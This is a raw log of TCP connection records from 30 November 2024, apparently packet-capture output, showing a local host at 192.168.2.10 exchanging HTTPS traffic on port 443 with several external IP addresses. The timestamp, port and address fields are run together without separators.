                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.017541885 CET4434999513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.017676115 CET49995443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.017712116 CET49995443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.017730951 CET4434999513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.017744064 CET49995443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.017749071 CET4434999513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.021087885 CET50001443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.021132946 CET4435000113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.021207094 CET50001443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.021369934 CET50001443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.021385908 CET4435000113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.393604994 CET4434999613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.396711111 CET4434999613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.396785975 CET49996443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.396821976 CET49996443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.396832943 CET4434999613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.396846056 CET49996443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.396851063 CET4434999613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.399957895 CET50002443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.400003910 CET4435000213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.400074005 CET50002443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.400226116 CET50002443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.400237083 CET4435000213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.416934013 CET4434999723.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.417320967 CET49997443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.417340994 CET4434999723.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.417737007 CET4434999723.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.418085098 CET49997443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.418170929 CET4434999723.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.418277979 CET49997443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.459331036 CET4434999723.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.496227980 CET50003443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.496270895 CET4435000394.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.496351004 CET50003443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.496675968 CET50003443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.496690035 CET4435000394.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.861028910 CET4434999723.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.861063957 CET4434999723.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.861155033 CET4434999723.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.861190081 CET49997443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.861232042 CET49997443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.864525080 CET49997443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.864553928 CET4434999723.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.167504072 CET4434999813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.168167114 CET49998443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.168189049 CET4434999813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.168848991 CET49998443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.168860912 CET4434999813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.400254965 CET4434999913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.401070118 CET49999443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.401103973 CET4434999913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.401573896 CET49999443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.401578903 CET4434999913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.617094994 CET4434999813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.620825052 CET4434999813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.620903969 CET49998443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.620965958 CET49998443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.620987892 CET4434999813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.621007919 CET49998443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.621015072 CET4434999813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.624541044 CET50004443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.624582052 CET4435000413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.624675035 CET50004443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.626810074 CET50004443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.626823902 CET4435000413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.653084993 CET4435000013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.660900116 CET50000443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.660921097 CET4435000013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.661446095 CET50000443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.661452055 CET4435000013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.757741928 CET4435000113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.758308887 CET50001443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.758337021 CET4435000113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.758817911 CET50001443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.758824110 CET4435000113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.834312916 CET4434999913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.838310003 CET4434999913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.838383913 CET4434999913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.838386059 CET49999443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.838562012 CET49999443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.838562012 CET49999443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.838562012 CET49999443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.841737032 CET50005443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.841777086 CET4435000513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.841856003 CET50005443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.842010975 CET50005443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.842025042 CET4435000513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.902690887 CET4435000394.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.902973890 CET50003443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.904685974 CET50003443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.904694080 CET4435000394.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.905566931 CET50003443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.905566931 CET50003443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.905582905 CET4435000394.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.905596972 CET4435000394.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.905703068 CET50003443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.905703068 CET50003443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.905725002 CET4435000394.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.905739069 CET4435000394.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.905972958 CET50003443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.906002998 CET4435000394.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.922254086 CET50003443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:11.922275066 CET4435000394.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.097326994 CET4435000013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.100785017 CET4435000013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.100867033 CET50000443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.100923061 CET50000443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.100934982 CET4435000013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.100943089 CET50000443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.100948095 CET4435000013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.104101896 CET50006443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.104157925 CET4435000613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.104234934 CET50006443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.104393959 CET50006443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.104407072 CET4435000613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.141062021 CET49999443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.141094923 CET4434999913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.183419943 CET4435000213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.184139967 CET50002443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.184165955 CET4435000213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.184660912 CET50002443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.184667110 CET4435000213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.192950010 CET4435000113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.196202040 CET4435000113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.196252108 CET50001443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.196261883 CET4435000113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.196316957 CET50001443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.196358919 CET50001443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.196374893 CET4435000113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.196388006 CET50001443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.196393967 CET4435000113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.199832916 CET50007443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.199866056 CET4435000713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.199949026 CET50007443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.200098991 CET50007443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.200109959 CET4435000713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.626662970 CET4435000213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.630681038 CET4435000213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.630745888 CET50002443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.630817890 CET50002443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.630836964 CET4435000213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.630853891 CET50002443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.630860090 CET4435000213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.634171963 CET50008443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.634217024 CET4435000813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.634341002 CET50008443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.634515047 CET50008443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.634530067 CET4435000813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.763631105 CET44349936104.70.121.147192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.763708115 CET44349936104.70.121.147192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.763885975 CET49936443192.168.2.10104.70.121.147
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.862360001 CET44349935104.70.121.147192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.862457991 CET44349935104.70.121.147192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:12.862514973 CET49935443192.168.2.10104.70.121.147
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.406749964 CET4435000413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.407382011 CET50004443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.407414913 CET4435000413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.408030033 CET50004443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.408035994 CET4435000413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.582998991 CET4435000394.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.583070993 CET50003443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.583085060 CET4435000394.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.583159924 CET50003443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.583364010 CET50003443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.583384037 CET4435000394.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.624628067 CET4435000513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.625148058 CET50005443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.625170946 CET4435000513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.625679970 CET50005443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.625684977 CET4435000513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.625685930 CET50009443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.625730038 CET4435000994.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.625848055 CET50009443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.626084089 CET50009443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.626096964 CET4435000994.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.851377964 CET4435000413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.851469994 CET4435000413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.851533890 CET50004443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.851850033 CET50004443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.851874113 CET4435000413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.851887941 CET50004443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.851895094 CET4435000413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.855598927 CET50010443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.855643988 CET4435001013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.855787992 CET50010443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.855956078 CET50010443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.855968952 CET4435001013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.885694981 CET4435000613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.886308908 CET50006443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.886341095 CET4435000613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.886939049 CET50006443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.886953115 CET4435000613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.979691029 CET4435000713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.980560064 CET50007443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.980580091 CET4435000713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.980990887 CET50007443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:13.980995893 CET4435000713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.070292950 CET4435000513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.070382118 CET4435000513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.070525885 CET50005443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.083219051 CET50005443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.083240986 CET4435000513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.083259106 CET50005443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.083265066 CET4435000513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.087093115 CET50011443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.087132931 CET4435001113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.087197065 CET50011443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.087379932 CET50011443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.087393045 CET4435001113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.330152988 CET4435000613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.333745003 CET4435000613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.333801031 CET4435000613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.333831072 CET50006443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.333893061 CET50006443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.333977938 CET50006443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.333997965 CET4435000613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.334008932 CET50006443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.334013939 CET4435000613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.337234020 CET50012443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.337280035 CET4435001213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.337353945 CET50012443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.337526083 CET50012443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.337539911 CET4435001213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.350409985 CET4435000813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.351131916 CET50008443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.351159096 CET4435000813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.351691961 CET50008443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.351697922 CET4435000813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.425689936 CET4435000713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.428896904 CET4435000713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.428992987 CET50007443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.429034948 CET50007443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.429054976 CET4435000713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.429080963 CET50007443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.429089069 CET4435000713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.432194948 CET50013443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.432240009 CET4435001313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.432322025 CET50013443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.432466030 CET50013443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.432481050 CET4435001313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.784883022 CET4435000813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.788749933 CET4435000813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.788831949 CET4435000813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.788953066 CET50008443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.788953066 CET50008443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.788953066 CET50008443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.788991928 CET50008443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.789012909 CET4435000813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.792422056 CET50014443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.792459965 CET4435001413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.792532921 CET50014443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.792695999 CET50014443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:14.792707920 CET4435001413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:15.072423935 CET4435000994.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:15.072609901 CET50009443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:15.073782921 CET50009443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:15.073793888 CET4435000994.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:15.081481934 CET50009443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:15.081489086 CET4435000994.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:15.636174917 CET4435001013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:15.636881113 CET50010443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:15.636899948 CET4435001013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:15.637269974 CET50010443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:15.637276888 CET4435001013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:15.830030918 CET4435001113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:15.833760977 CET50011443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:15.833774090 CET4435001113.107.246.63192.168.2.10
